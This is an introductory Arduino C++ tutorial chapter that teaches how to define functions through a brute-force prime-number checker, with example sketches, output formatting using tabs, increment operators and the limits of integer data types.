A client certificate can be given a "friendly name" when it is created; ne_ssl_clicert_name will return this name (or NULL if no friendly name was specified). ne_ssl_clicert_name can be used when the client certificate is in either the encrypted or decrypted state, and will return the same string for the lifetime of the object.
The function ne_ssl_clicert_owner returns the certificate part of the client certificate; it must only be called if the client certificate is in the decrypted state.
When the client certificate is no longer needed, the ne_ssl_clicert_free function should be used to destroy the object.
ne_ssl_clicert_read returns a client certificate object, or NULL if the file could not be read. ne_ssl_clicert_encrypted returns zero if the object is in the decrypted state, or non-zero if it is in the encrypted state. ne_ssl_clicert_name returns a NUL-terminated friendly name string, or NULL. ne_ssl_clicert_owner returns a certificate object.
The following code reads a client certificate and decrypts it if necessary, then loads it into an HTTP session.
ne_ssl_client_cert *ccert; ccert = ne_ssl_clicert_read("/path/to/client.p12"); if (ccert == NULL) { /* handle error... */ } else if (ne_ssl_clicert_encrypted(ccert)) { char *password = prompt_for_password(); if (ne_ssl_clicert_decrypt(ccert, password)) { /* could not decrypt! handle error... */ } } ne_ssl_set_clicert(sess, ccert);
ne_ssl_cert_read
Joe Orton <neon@lists.manyfish.co.uk> | http://www.makelinux.net/man/3/N/ne_ssl_clicert_read | CC-MAIN-2015-14 | refinedweb | 308 | 54.93 |
This project will be using an InnoSent IPM 165C and / or IVS 362 module to sense distance and motion towards / away from the observer.
Not a member? You should
Already have an account?
To make the experience fit your profile, pick a username and tell us what interests you.
We found
and
based on your interests.
Choose more interests.
I thought it would be a good idea to make some side by side comparisons of the unit operating inside a clutter room and outside, pointing up in the air. A digital high pass filter was used to set all the low frequency fundamentals and first set of harmonics on the FT to zero.
As can be seen, there are a couple of spikes about 1/3 of the way along the horizontal axis on the cluttered room FT that are different from the open air, but it's not particularly obvious. There should be more spikes beyond the 3m mark, which is about 1/2 way along the horizontal, but there's nothing there.
The varactor tuning pin was given a triangular voltage signal as shown below and there was no discernible difference between inside and outside:
I'm thinking that the IVS-362 is under powered and faulty :(
Apparently the IVS-362 should have a range of 20m, so something is wrong!
These are some oscilloscope screenshots with the signal generator set to 200Hz with a voltage amplitude of 2.7 volts:
Channel IF1:
These readings were taken in a cluttered indoor environment with plenty of reflective objects in the 3 to 5 m range. But the module does not seem to be very responsive.
The IVS-362 radar module was firstly calibrated by pointing it up into the air and then a 500mm x 500mm metal sheet was positioned about 3m directly in front of it. The FT graph above clearly shows a set of readings indicating distance. We expected the set of spikes on the graph to move to the right slightly as the metal sheet was moved away, but the maximum range seems to be 3 m.
The abbreviation FMCW stands for Frequency-modulated continuous-wave radar.
On the right hand side is displayed readings from the oscilloscope with red being the output trianglular wave which feeds into the varactor input of the radar module. The blue trace is the output from the radar, amplified by the 2 stage op amp. The signal generator on the 'scope is not great quality, as can be seen by it's severe grainyness. However, on the left hand side, the FT generated by the Feather M4 expres still manages to seperate the poignant frequencies that give an indication of object size and distance from the sensor. Code for the FT is given below.
/* This example shows the most basic usage of the Adafruit ZeroFFT library.
* it calculates the FFT and prints out the results along with their corresponding frequency
*
* The signal.h file constains a 200hz sine wave mixed with a weaker 800hz sine wave.
* The signal was generated at a sample rate of 8000hz.
*
* Note that you can print only the value (coment out the other two print statements) and use
* the serial plotter tool to see a graph.
*/
#include "Adafruit_ZeroFFT.h"
#include "signal.h"
//the signal in signal.h has 2048 samples. Set this to a value between 16 and 2048 inclusive.
//this must be a power of 2
// #define DATA_SIZE 1024
#define DATA_SIZE 1024 // This is compatible with Arduino serial plotter where x axis ring buffer cant be changed from 500.
// To make the actual plot, data size is reduced to 1000 and then divided by 2.
// the sample rate:
#define FS 39700 // Limited by speed of analogRead
int16_t data[DATA_SIZE];
int16_t bigData[DATA_SIZE];
// the setup routine runs once when you press reset:
void setup()
{
Serial.begin(115200);
while(!Serial); //wait for serial to be ready
/* // run the FFT
ZeroFFT(signal, DATA_SIZE);
// data is only meaningful up to sample rate/2, discard the other half
for(int i=0; i<DATA_SIZE/2; i++)
{
//print the frequency
//Serial.print(FFT_BIN(i, FS, DATA_SIZE));
//Serial.print(" Hz: ");
//print the corresponding FFT output
//Serial.println(signal[i]);
}
*/
}
void loop()
{
for(int i=0; i<DATA_SIZE; i++)
{
bigData[i] = 0;
}
int32_t avg = 0;
unsigned long beforeMicros = micros();
int k = 50;
for(int j=0; j<k; j++)
{
for(int i=0; i<DATA_SIZE; i++)
{
int16_t val = analogRead(A2);
// delayMicroseconds(50);
// delayMicroseconds(10); // ( 1u = 1MHz, 10u = 100 KHz, 100u = 10KHz)
avg += val;
data[i] = val;
}
unsigned long afterMicros = micros();
float totalMicros = afterMicros - beforeMicros;
//remove DC offset and gain up to 16 bits
avg = avg/DATA_SIZE;
for(int i=0; i<DATA_SIZE; i++) data[i] = (data[i] - avg) * 64;
//run the FFT
ZeroFFT(data, DATA_SIZE);
for(int i=0; i<DATA_SIZE; i++)
{
bigData[i] = data[i] + bigData[i];
}
}
int dataMax = 0;
int dataMaxIndex = 600;
for(int i=0; i<DATA_SIZE; i++)
{
data[i] = bigData[i]/k;
// Find whichvalue of i gives the fundamental frequency:
if(data[i] > dataMax)
{
dataMax = data[i];
dataMaxIndex = i;
}
}
int fundamental_center = dataMaxIndex;
int fundamental_1 = fundamental_center - 4;
int fundamental_2 = fundamental_center - 3;
int fundamental_3 = fundamental_center - 2;
int fundamental_4 = fundamental_center - 1;
int fundamental_5 = fundamental_center + 0;
int fundamental_6 = fundamental_center + 1;
int fundamental_7 = fundamental_center + 2;
int fundamental_8 = fundamental_center + 3;
int fundamental_9 = fundamental_center + 4;
//data is only meaningful up to sample rate/2, discard the other half
for(int i=0; i<(DATA_SIZE-24)/2; i++) // The '-24' is to try get the data to fit in Arduino serial plot window.
{
// Try and remove the fundamental frequency from the plot:
if((i==fundamental_1)||(i==fundamental_2)||(i==fundamental_3)||(i==fundamental_4)||(i==fundamental_5)||(i==fundamental_6)||(i==fundamental_7)||(i==fundamental_8)||(i==fundamental_9))
{
data[i] = 0;
// Serial.println(data[i]);
}
if(data[i]<0)
{
data[i]=0;
// Serial.print(" negative value detected at index: ");Serial.println(i);...
This is pretty much the expected result for non-Doppler static object detection, so all is good. Next task is to get this waveform into a RPi via an ADC without turning it into toast. Some lowering of the voltage and removal of DC offset may be required. Then, a bit of Fourier transform magick to pull out the hidden frequency and amplitude elelments.
The Radar module has been mounted on the DIY PCB with a 2 stage op amp for each signal output. Tested all ok. Great care needs to be taken to prevent damage to the module by static voltage. Next step is to hook up the oscilloscope and have a look at the output wave forms again.
Featuring mounts for the IVS 362 and the IPM 165C, with op amp circuits in the big white boxes with rounded corners. The IPM 165C has already been tested with oscilloscope and just needs the signal amplified for presentation to the ADC.The circuit schematic for the op amps is as below:
View all 7 project logs
Already have an account?
Paul Mathews
Roman
andreasklostermann
Grant Giesbrecht
Become a member to follow this project and never miss any updates
Contact Hackaday.io
Give Feedback Terms of Use
Hackaday API
© 2021 Hackaday
Yes, delete it
Cancel
You are about to report the project "Radar Sensor", please tell us the reason.
Your application has been submitted.
Are you sure you want to remove yourself as
a member for this project?
Project owner will be notified upon removal. | https://hackaday.io/project/179340-radar-sensor | CC-MAIN-2021-49 | refinedweb | 1,224 | 51.99 |
Building your own C++ Functions¶
See also
Text (Chapters 6)
Functions are an essential part of programming. They provide us with a way to break up a big program into smaller, more manageable chunks, and they provide a way for many programmers to work on a big project. We need to understand how they are written and used before our programs can get more interesting!
When we introduced the concept of a function earlier in the course (which we did so you would have some understanding of what was going on in many of our simple graphics exercises), we described a function as a box with some code in it. This is a fairly good model to use for understanding what a function really is. To understand how to write our own functions, let’s look closer at this box!
The box has two important parts - the
visible (public) part that can be
seen by other parts of your program, and the
invisible (private) part
that is
hidden from view. The user of the function has no need to really
know what is going on inside the box, they simple need to understand what the
function does, and how to call it. But, clearly, the person who actually writes
the code inside the box needs to know in gory detail what the function is up
to! The function programmer also needs to know how the function will be called,
and how to do the job the function is intended to do!
We need to create both parts of a function for it to work properly, but keeping these two parts separate in our minds is important to making functions work as a vital tool of programming!
The first thing we need to do is to describe the
public part of the
function:. The code that defines the action of the function is not part of this definition, it belongs to the private part of the function.
Here is an example of how it all looks in C++:
float my_sin(float angle) { // everything inside the braces is private! }
I named this function my_sin so it does not interfere with the real C++ sin function we have been using (from the cmath library). a floating point number.
Function prototypes¶
Since we have completely defined the public part of the function, we can (and should) leave off the function body part when we tell users of the function what they need to know. What we do in this case is a bit odd. We place a semicolon after the close parenthesis that marks the end of the parameter part. Like this:
float my_sin(float angle);
This is called a
function prototype and it serves a very important role in
programming.
The caller - producer contract¶
When two programmers sit down and decide how to carve off a chunk of program that will become a function, they need to agree on what the public part of the function will look like. (By the way, you might be both programmers!) That way the programmer who will use the function will know how to call it, and the programmer who will make it work will know what information they will be provided with when the function is called. This is a kind of contract between the two workers.
The prototype also serves another important role in programming.
Defining things before they can be used¶
The C++ compiler has a simple rule that programmers must follow. Before you can use any name in a program, you must have defined that name before the point where you use it. We have seen this in how we define variables at the top of our code, then use those variables in later code.
The same rule applies in using functions. What we need to do is to tell the
compiler everything it needs to know about a function before we can call that
function. We do this by placing the
function prototype at the top of our
program (before that
main line). In fact, we place it right up there where
we have been putting those
include lines.
Including files¶
You have been doing this all along, without really knowing why. Time to fix
that! Those
include lines are actually causing the compiler to read another
file on your system containing a bunch of
function prototypes for various
function we can use in our programs. Collections of these functions are called
libraries, and these help make you more productive - you do not need to
recreate code others have written for you! You can create your own libraries if
you wish. I set up a simple library of supporting graphics functions and you
access those by
including the
Graphics.h file in your program. (The
actual code for those functions is located in the
Graphics.cpp file!) We
will use this technique later when we learn how to build bugger programs
involving more that one file.
Note
In an include line, any file name surrounded by angle brackets is located
with the compiler. These are called
system libraries and they are part
of any C++ installation. File names surrounded by double quotes are local
names you need to place on your system (in with your project code, for
example).
Into the void¶
We need to make one last observation about functions before we look at how to write the actual function code.
Not all functions need parameters to be useful, and not all functions need to
return a value! In both cases, we use the word
void to mean
nothing is
here.
For instance, suppose I want to cut by big program into three parts:
- Input data
- Process data
- Output results
I might do so using these three functions:
void get_data(void); void process_data(void); void output_results(void);
What should jump out at you right away in looking at this is
how does data
get from inside one of these functions into the others?
The answer is something called
global variables. That is, variables defined
outside any function at the very top of your program. We really do not want
to use such variables much, but in some cases, they are useful. We will not use
them often in this class, except in a few special cases.
Function stubs¶
I tend to create functions like those shown above when I am first creating a
program. As soon as I thinks up a case where some part of the program can be
placed in a function, I create the
stub of that function using something
that looks like the prototypes shown above. Then I can write code that uses
these functions well before I figure out what goes inside the functions. We
will see an example of this in a bit.
Function implementations¶
When it is time to actually write the code of the function (perhaps in the same file with the rest of your program), we repeat the function prototype and replace the semicolon with a curly bracket pair, inside of which we place the code that does the function’s work!
The body of the function is the code between the curly braces. If the function returns a value,.
Just for fun, let’s look at the code that calculates the
sin of an angle,
using a technique you might find doing some research on the Internet.
Here is how the sin function gets its answer:
- sin(x) = x - x^3 /3! + x^5 /5! - x^7 /7! + …
Note
That funny upward pointing character is called a caret, but in this case it means “raised to the power of whatever number comes next”. So, “X^3” means “X*X*X” or “X raised to the third power” or “X cubed”.
Mathematicians call this a Taylor series for sin, but that is not important to us here. The formula is, though, since we will use that formula to do our calculations. If you look closely at this formula, you can see a pattern than tells you what the next term will be. You can keep going with more terms pretty much forever. The more terms you use, the better the answer will be. Unfortunately, C++ has no special power operator (which means raise the number x to this power - multiply it times itself this many times), so we need to do repeated multiplication. And, in case you don’t know what a factorial is, here is the formula for that:
- 5! = 5*4*3*2*1
Note
I know this math stuff is causing several of you some problems. Please do not let that keep you from trying this out. You will find that computers can help you with math, just as calculators do! You will get past this problem soon enough!
Local Variables¶
We know we need to create containers to hold the data we will manipulate in our programs. The function may need containers to do its work, as well. We let the function declare variables as needed inside the function. These local variables are created when the function starts work, and are destroyed when the function stops work. If you activate the function again, there is no memory of what was in these containers previously.
Strictly speaking, the parameters are also local variables, but they have a special property. They are assigned values by the caller of the function.
Coding the function body¶
Once we have the actual work we need to do inside the function figured out, and have containers for the local variables we need to use, the actual coding of the function is just like any other programming problem. However, in this case, we focus on the work of just the function, not the rest of the program. In fact, if we do this right, the programmer who writes the function code does not need to know anything about the program that will use that function.
The ideal world of programming is filled up with good solid general purpose functions that do one job well, and we use that function as a tool in constructing our new program. If every programmer had to start from scratch, we would not get very far in our world of computer programming!
We will look at the code for implementing the rest of the
my_sin function
later. For now, let’s look at how we call.
Note
In case a function does not need parameters, you still need to supply the open and close parentheses, just put nothing between them!
Parameters can be literal values, or the names of variables defined in our calling code, or expressions the system will evaluate before calling the function. The system will pass the data we specify into the function when the function wakes); // remember why? (
assignment).
Functions with no Parameters¶
It is quite common to set up functions that do not need parameters to work, but still return a value. For example, suppose you want to write a chunk of code that gets a number from the user:
int GetUserValue(void) { int value; while(true) { cout << "Enter an integer between 1 and 10:"; cin >> value; if(value < 1 || value > 10) cout << endl << "Bad input, try again" << endl; else break; } return value; }
Notice that we place the word void inside the parameter area on the function definition. This means that the parameter list is empty.
With this function defined, the calling code can be easier to follow:
// working... // get the value from the user number = GetUserValue(); // use the number
The code is much easier to follow when the details of getting a number from the user are wrapped up and placed in another spot in our program.
Functions with no Value¶
Wait a minute, functions with no value? What I really mean is functions that return no value! (They have a value, as we shall see!)
Functions do not need to return values to be useful. When we started this course, we talked about diagramming process boxes, and a function is a great way to box up the code related to doing a process. We can even use a name that describes the process. The previous example shows this. GetUserValue is a good name describing the process we want to accomplish.
Try this:
int main(int argc, char **argv) { int number, factorial; DisplayHeading(); DisplayInstructions(); number = GetUserNumber(); factorial = EvaluateFactorial(number); ShowResults(factorial); DisplayFooter(); return EXIT_SUCCESS; }
Hey, wait a minute. That main thing looks like a function! Exactly right! The main function is nothing more than a special function in your program that is activated by the operating system when you decide to run your program. The parameters for your program come from the operating system. We will show how this is done in a later lecture.
The DisplayHeading, DisplayInstructions, and DisplayFooter functions take no parameters, and deliver no results. The activation statement is just a reference to the function name with the parentheses, empty this time.
Notice that we do not need a return statement inside the function if we are not returning a value.
Doesn’t the program seem pretty clear, even when we do not see the function definition?
That is the point. You can use functions to break up the logic of your program the same way we used process boxes in our diagramming. Pick good names and you can almost read the program the same way you read the diagrams.
Where do we put the function declarations?¶
As we said before:
- A name must have been declared before it can be used in a program.
That means that we cannot call a function if the function has not been declared yet. So, our example program above would need to be written with the function declarations above the main function.
If we want to do this, there is no need to split up the function into two separate parts. We simple place the full definition of the function at the top of the program like this:
void DisplayHeading(void) { // code to display heading } void DisplayInstructions(void) { // code to display instructions } ... int main(int argc, char ** argv) { DisplayHeading(); DisplayInstructions(); // more main program code }
Notice that the code for the functions is missing. This code will compile and run. But the functions do not do anything. That is fine for now, since we are just starting with the program development.
Alternatively, we can choose to place the full function definition below the main program function. In this case, the code would look like this:
void DisplayHeading(void); void DisplayInstructions(void); int main(int argc, char ** argv) { DisplayHeading(); DisplayInstructions(); // more main program code } void DisplayHeading(void) { // code to display heading } void DisplayInstructions(void) { // code to display instructions }
Here, the compiler is happy since it knows exactly how our two functions should
be called when it processes the code inside the main function. It figured this
out by processing the
prototype lines at the top of the code. This program
works exactly like the previous one. Which one you choose to use is up to you!
More Programming in Baby Steps¶
I have been trying to get you to write your programs in small steps. Once we have functions available to us, we can create programs in a very easy way, and work with code that does something right away. Here is how it goes:
#include <iostream> using namespace std; int main(int argc, char ** argv) { // do something useful cout "DoSomethingUseful()" << endl; return EXIT_SUCCESS; }
Cute, it prints out the name of a function! What good is that?
Continuing:¶
#include <iostream> using namespace std; void DoSomethingUseful(void) { cout << "Doing Something Useful!" << endl; } int main(int argc, char ** argv) { // do something useful DoSomethingUseful(); return EXIT_SUCCESS; }
Here, I have refined the first code by adding in the function I need. I replaced the output statement in the main program with a call to the function. That function does not really do anything useful at the moment, but it does do something. It displays a message and quits. Trust me, I actually code this way, and make sure everything works before I move on. It actually saves me time in the long run!
This kind of function is sometimes called a stub, meaning it is just a placeholder for a real function that will be refined later. We can call the function and see that the program works, even if it is not finished yet!
Let’s try another step:
#include <iostream> using namespace std; void DisplayInstructions(void) { cout << "Enter a number between 0 and 20:"; cout << endl; // replace with a read later } void CalculateFactorial(int number) { cout << "Calculating the factorial of " << number << endl; } int main(int argc, char ** argv) { // display instructions DisplayInstructions(); // do something useful CalculateFactorial(5); return EXIT_SUCCESS; }
Here, I renamed the DoSomethingUseful function to CalculateFactorial, and changed the message to say what would happen eventually. I also added another simple function to display instructions.
I modified the CalculateFactorial function so it can get a value through a parameter.
Next, I see that the instructions are really the point where I want to get a user number. Let’s refine the program and do that:
#include <iostream> using namespace std; int GetUserValue(void) { int value; while(true) { cout << "Enter an integer between 1 and 10:"; cin >> value; if(value < 1 || value > 10) cout << endl << "Bad input, try again" << endl; else break; } return value; } void CalculateFactorial(int number) { cout << "Calculating the factorial of " << number << endl; } int main(int argc, char ** argv) { int num; // display instructions num = GetUserValue(); // do something useful CalculateFactorial(num); return EXIT_SUCCESS; }
Here, I expanded the body of the GetUserValue function as we showed earlier. The routine gets a number from the user, and that number is passed into the CalculateFactorial function.
This should be enough to give you an idea how Baby Steps works. At each point in the process, I made tiny modifications and kept working with a program that actually runs and does something. If I make a mistake, the tiny steps were where the mistake happened, and I should not proceed until I work through the problem.
Programming is much more fun when things work more than when they don’t! | http://www.co-pylit.org/courses/cosc1315/functions/02-building-functions.html | CC-MAIN-2018-17 | refinedweb | 3,018 | 68.91 |
I’ve long been a fan of test driven development in theory but in practice have experienced many of the issues which turn people off TDD and unit testing in general.
Brittle tests which do too much, tell you very little about the meaning behind the code and are more a hindrance than a help when it comes to making changes at a later date.
Well as you may have guessed, given the title of this post, I have found an answer to these problems in the form of BDD using MSpec and Rhino Automocking. I have been using this approach for a good while now and continue to be pleasantly surprised by just how much fun it is writing my tests, but also how stupidly easy they are to change, and how well they document my project’s requirements.
Update: You can get MSpec from github.
External Tool
It’s a good idea to set up an external tool in Visual Studio to run your MSpec tests and produce html output.
Create a new external tool which launches mspec.exe with the following arguments.
$(TargetName)$(TargetExt) --html "$(ProjectDir)Report.html"
Make sure the initial directory is $(BinDir) and tick Use output window.
Using your favourite Test Runner
Included in the MSpec download are scripts to configure various test runners to recognise and run MSpec tests.
Simply run the bat file which relates to your build runner and way you go!
Writing Specifications
Ensure you add a reference (in your Tests Project) to Machine.Specifications.dll.
Now the fun begins.
I’ve created an ASP.NET MVC site and empty class library Tests project.
Let’s say we want to create a simple page which allows users to search for a product.
We’ll start by creating a new folder in our tests folder called Controllers and add a new class file called ProductControllerTets.cs
Having discussed this feature in detail with the client, I’ve a pretty good idea of what they want, so I start with the following.
- using Machine.Specifications;
-
- namespace MSpecExample.Tests.Controllers
- {
- [Subject("Product Search")]
- public class when_product_search_page_requested
- {
- It should_return_product_search_page;
- }
-
- [Subject("Product Search")]
- public class when_asked_for_products_matching_search_term
- {
- It should_retrieve_a_list_of_products_with_titles_containing_the_search_term;
- It should_return_the_list_of_products_to_the_user;
- }
-
- [Subject("Product Search")]
- public class when_empty_search_term_entered
- {
- It should_return_an_error_message;
- }
- }
What I particularly like about this, is that you can really think about exactly what you’re doing and express it in code which will eventually become executable tests without actually implementing any code (yet!).
If we now build our test project and run the tests using the console runner via the external tool we set up earlier), we’ll get a report.html file in the tests project which looks like this…
In part 2, we’ll start implementing these tests.
In part 3, we’ll introduce Rhino AutoMocker. | https://jonhilton.net/2009/11/10/bdd-with-mspec-and-rhino-auto-mocks/ | CC-MAIN-2018-51 | refinedweb | 463 | 61.46 |
Get the highlights in your inbox every week.
Format Python however you like with Black
Format Python however you like with Black. In the first article, we learned about Cython; today, we'll examine the Black code formatter.
Black
Sometimes creativity can be a wonderful thing. Sometimes it is just a pain. I enjoy solving hard problems creatively, but I want my Python formatted as consistently as possible. Nobody has ever been impressed by code that uses "interesting" indentation.
But even worse than inconsistent formatting is a code review that consists of nothing but formatting nits. It is annoying to the reviewer—and even more annoying to the person whose code is reviewed. It's also infuriating when your linter tells you that your code is indented incorrectly, but gives no hint about the correct amount of indentation.
Enter Black. Instead of telling you what to do, Black is a good, industrious robot: it will fix your code for you.
To see how it works, feel free to write something beautifully inconsistent like:
def add(a, b): return a+b
def mult(a, b):
return \
a * b
Does Black complain? Goodness no, it just fixes it for you!
$ black math
reformatted math
All done! ✨ 🍰 ✨
1 file reformatted.
$ cat math
def add(a, b):
return a + b
def mult(a, b):
return a * b
Black does offer the option of failing instead of fixing and even outputting a diff-style edit. These options are great in a continuous integration (CI) system that enforces running Black locally. In addition, if the diff output is logged to the CI output, you can directly paste it into patch in the rare case that you need to fix your output but cannot install Black locally.
$ black --check --diff bad
--- math 2019-04-09 17:24:22.747815 +0000
+++ math 2019-04-09 17:26:04.269451 +0000
@@ -1,7 +1,7 @@
-def add(a, b): return a + b
+def add(a, b):
+ return a + b
def mult(a, b):
- return \
- a * b
+ return a * b
would reformat math
All done! 💥 💔 💥
1 file would be reformatted.
$ echo $?
1
In the next article in this series, we'll look at attrs, a library that helps you write concise, correct code quickly.
3 Comments
Is there any way to configure the style that black uses?
For example, the number of space it uses for each indentation level? Also I really, really dislike defs and function calls with no space before the opening parenthesis.
Nearly 40 years ago when I was writing PL/1 on a Multics system, there was a programmed called format_pl1 which used a specific comment at the head of the source code for customising the format.
Have we learned nothing?
You can configure black to do anything you like, as long as what you like is its default configuration....
I read the documentation and it has # fmt: off and # fmt: on to exclude those cases where you just need to preserve formatting, so I _could_ live with it. | https://opensource.com/article/19/5/python-black | CC-MAIN-2020-34 | refinedweb | 503 | 72.26 |
* Sam Newman <sam.newman@> [010424 19:21]:
> I'm guessing its a catalina specific error as I've not seen a tomcat error
> like that before except in my code. Have you looked at the sourcecode?
Sure, I am stupid. It is Tomcat/Caterina 4.0b3. The source looks
simple (I do not understand it though):
// Instantiate a new instance of this filter and return it
Class clazz = classLoader.loadClass(filterClass);
this.filter = (Filter) clazz.newInstance(); // This lines throw the error
filter.init(this);
return (this.filter);
this.filter is defined for a private Filter, which is a
javax.servlet.Filter . filterClass is defined as:
// Identify the class loader we will be using
String filterClass = filterDef.getFilterClass();
etc...
Maybe I will go and do some basic debugging.
/GCS | http://mail-archives.apache.org/mod_mbox/tomcat-users/200104.mbox/%3C20010424193314.A12491@sisinteli07.udg.es%3E | CC-MAIN-2017-26 | refinedweb | 128 | 53.58 |
public boolen checkPressPoint(Point pressPt, int width, int height) {
how to create a rectangle to return true if the parameter Point object is inside the card upload in java
image upload in java Hi, I am working with java. In my application i want to give facility to user to add and change image. I use open dialog box to select image, it will work properly i.e on button click open dialog is open... this?????
i am using java swing.........
import java.sql.*;
import... java.awt.event.*;
public class UploadImage extends JFrame {
Image img;
JTextField
Image Processing Java
:// Processing Java Using This Code I Compressed A JPEG Image And the Original Size of the image is 257kb and The Compressed Image Size Is 27kb
Computer Sciencemana August 13, 2011 at 12:28 PM
public boolen checkPressPoint(Point pressPt, int width, int height) { how to create a rectangle to return true if the parameter Point object is inside the card object??
Post your Comment | http://www.roseindia.net/discussion/20911-Rectangle-Image-in-Java.html | CC-MAIN-2014-52 | refinedweb | 164 | 57.2 |
This forum has migrated to Microsoft Q&A. Visit Microsoft Q&A to post new questions.
Complete noob, trying to learn EF. I have a data model as follows:
public class Address
{
public int AddressID { get; set; }
public string Street { get; set; }
public string CityStateZip { get; set; }
}
public class Employee
{
public int Id { get; set; }
public string Name { get; set; }
public Address EmployeeAddress { get; set; }
}
public class Client
{
public int Id { get; set; }
public string Name { get; set; }
public Address ClientAddress { get; set; }
}
public class Vendor
{
public int Id { get; set; }
public string Name { get; set; }
public Address VendorAddress { get; set; }
}
I'm using "code first" migration in EF Core to generate the database. Everything works as you would expect except for deletes. Deleting any of the parent objects (i.e. employee) will not cascade delete the child (Address).
I've even tried changing the migration script from:
table.ForeignKey(onDelete: ReferentialAction.Restrict);
to
table.ForeignKey(onDelete: ReferentialAction.Cascade);
The database design screen even shows:
([AddressID]) ON DELETE CASCADE
Any help would be appreciated.
Hi wgcampbell,
About "Cascade Delete", here I found some document maybe you can refer to.
Cascade Delete,
Cascade deleting with EF Core.
Hope these can help you.
Regards,
Kyle.
Myself, I configure the DB engine to do cascade deletes, just delete the parent record and let the DB engine delete the records form child tables. | https://social.msdn.microsoft.com/Forums/en-US/a3ffaf97-ce8d-423e-9418-ac22c269d405/wont-cascade-delete?forum=adodotnetentityframework | CC-MAIN-2021-39 | refinedweb | 229 | 64.1 |
Objectives
- Work with integers.
- Learn to define functions in Arduino C++.
- Working on logic (and algorithmic) thinking.
- Different kinds of integers in C++.
Bill of materials
THE FIRST FUNCTION: CHECKING WHETHER A NUMBER IS PRIME
We have already mentioned before, that programming is a bit like riding a bike, you learn to ride by riding and you learn to program… by programming. You have to learn the syntax of the language, C ++ in our case, but also to learn how to solve logical problems and split them into instructions.
Do a programming course is fine but at the end you have to get hands-on programming and have problems to solve, because only solving them, alone or with some help, you can learn. You can’t learn to swim just studying!
With a trembling hand, let’s focus this chapter on some classic examples of programming, such as calculating prime numbers, to train the skill to find out practical algorithms to solve more or less abstract problems and to introduce some additional concepts.
- It is important to note that there is no single way to solve a particular problem and that one does not have to be better than another, but often efficiency or elegance criteria are applied to choose a solution.
This chapter will require a little more effort than the previous ones because we will start training a little-used muscle, brain, in a rare task, to think. And this is something that requires some effort, but it is necessary to advance.
Suppose we want to create a programming artefact which returns true or false depending on whether the number we provide is prime or not and to which we can call several times without copying the code again and again. We will call it Prime() and it works as follows: If the number is prime it must return true, otherwise it returns false, that is, it must return a boolean value.
This is what we call a function.
In fact, we have already used several functions that Arduino C++ provides, as Serial.print(), Serial.available(), abs(), etc. They are recognized by the opening and closing braces after the name.
C++ provides all the tools we need to build our own functions, which is very useful because it helps us to split a general problem into pieces or smaller functions easier to handle.
To define a function we have to declare it first and then tell C++ what it has to do. Let’s follow with our example function, Prime():
bool Prime( int x) // x represents the parameter that will be passed to the function { Here goes what the function has to do ... return( bool); }
Note that the first word in the function is bool. This word defines the type of data that is returned when the function is called. In our case, we have defined the Prime() function to return a boolean data type, so we must include at some point either the statement return(true) or return(false) to return the result to the caller. If the function would return an integer we had to define it this way: int Prime( int x).
- If a function does not return any value but simply does its job and just ends, then we have to declare it as void (empty). We already know two of these functions well: setup() and loop().
Let’s see how could be the code inside the Prime() function:
bool Prime( int n) { for ( int i = 2 ; i <n ; i++) { if ( n % i == 0) // If the remainder is 0 then the number is divisible and is not prime. { Serial.println ( String(n) +" is divisible by : " + String(i)) ; return(false) ; } } return (true) ; }
To find out whether a number n is prime or not, we only have to divide it by all positive numbers greater than 1 and less than n. In the example, we divide the number n by all positive numbers ranging between 2 and n-1.
If we find out, inside the for loop, that the remainder of n modulo i (n % i == 0) is equal to zero, then the number n is divisible by i and is not a prime number. That implies that we must return false to the instruction that called the function.
If no divisor is found, the function only has to return true after the for loop. This is called a brute force method and can be certainly improved, but it works at the moment.
To use the Prime() function we have to pass it an integer as argument, int n. An argument or parameter is the data that we pass to the function so that it can perform its task. Remember that when we defined the function we wrote: bool Prime(int n), where n represents the number we want to check.
Let’s write the loop() function to check whether it works:Sketch 8.1
void loop() { int x = 427 ; // The number to test bool p = Prime(x); if (p ) Serial.print( String(x) + " is prime.") ; else Serial.print( String(x) + " is not prime." ) ; }
Let’s see how many primes there are up to 1024.Sketch 8.2
bool control = true ; int maximum = 1024 ; void loop() { if (control) // This control variable avoids that the if block repeats again and again { Serial.println( "These are the prime numbers up to " + String( maximum)) ; Serial.println( "-----------------------------------------"); Serial.println("Prime number position = \t1: \t Prime number = 1"); // 1 is the first prime number but we don't use it later, of course int counter = 1; for ( int x = 2 ; x < maximum ; x++) { bool p = Prime(x); if (p){ counter++; Serial.println("Prime number position = \t" + (String)counter + ": \t Prime number =\t" + x) ; } } } control = false ; } bool Prime( int n) { for ( int i = 2 ; i <n ; i++) { if ( n % i == 0) // If the remainder is 0 then the number is divisible and is not prime. return(false) ; } return (true) ; // If this statement is executed then we have not found any divisor and the number is prime }
Although the program works correctly, the output is not very compact (remember that we like to be stylish). Let’s give the output a more appropriate format by using the tab character (the tabulator), which is represented as ‘\t’ , and a comma.Sketch 8.3
bool control = true ; int maximum = 1024 ; int counter= 1 ; void loop() { if (control) // This control variable avoids that the if block repeats again and again { Serial.println( "These are the prime numbers up to " + String( maximum)) ; for ( int x = 2 ; x < maximum ; x++) { if (Prime(x) ) if (counter++ % 8 == 0) Serial.println(String(x)+"," ) ; else Serial.print(String(x) +","+ '\t') ; } } control = false ; }
Now the program formats the output in a slightly more presentable and comfortable way to be read.
To achieve this, we have added a comma and a tabulator after each number except one of every 8, the last, because we have used rows that contain eight columns. When we reach the eighth column, instead of using Serial.print() we do use Serial.println() because this way C++ inserts also a new line and a carriage return, a line break.
We should comment also the following line:
if (counter++ % 8 == 0)
When we write two plus symbols after the name of a variable, ++, that indicates C++ that it must use the current value of the variable and after that increase its value by 1. Technically speaking, these two plus symbols are called the post-increment operator.
We could also have written the instruction this way:
if (++counter % 8 == 0)
In the last instruction C++ increases the value of the counter variable by one before using it. This notation is quite common in C++ and we should recognize it. We call the two plus symbols before the name of a variable the pre-increment operator.
There is another pair of operators that can be used to decrement the value of a variable (counter in our case): the pre-decrement operator, –counter, and the post-decrement operator, counter–.
THE INTEGER DATA TYPE
This would be a good time to wonder how much could our integer variable grow up in the previous program. We assigned it a value of 1024, but does the integer data type have a size limit?
The answer is yes. The integer data type in Arduino C++ uses 16 bits, so the maximum value we can get would be 216 -1= 65.535. There are 65.536 values but we must count also the zero, so the maximum value we can get is 65.535. But as the integer data type is signed, the values range from -32.768 to +32.767.
In fact, Arduino C++ provides several data types to handle integer numbers:
All these data types represent signed and unsigned integers and can be used to work with really big numbers, but all of them have a size limit.
